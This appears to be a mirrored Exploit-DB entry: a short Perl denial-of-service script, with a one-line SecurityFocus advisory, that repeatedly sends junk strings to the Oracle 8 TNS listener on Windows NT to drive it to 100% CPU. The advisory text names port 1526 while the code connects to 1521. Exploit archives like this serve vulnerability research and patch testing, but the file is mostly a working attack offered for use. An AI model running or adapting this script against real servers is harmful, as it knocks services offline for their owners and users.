exploit-db-mirror/exploits/windows/dos/20779.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
848 B
Perl
Executable file

source: https://www.securityfocus.com/bid/2626/info
A denial of service vulnerability exists in Oracle 8. An attacker connecting to port 1526 and sending invalid input will cause the 'TNSLSNR80.EXE' process to consume all available system resources, causing the server to stop responding.
#!/usr/local/bin/perl -w
# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com
use IO::Socket;
$host="kickme";
# enter the hostname of the oracle-server to kick
socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);
sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
sleep(2);
print HANDLE "dfsdffdfsfdggfdgdf";
# an arbitrary, but carefully chosen constant...
}
close(HANDLE);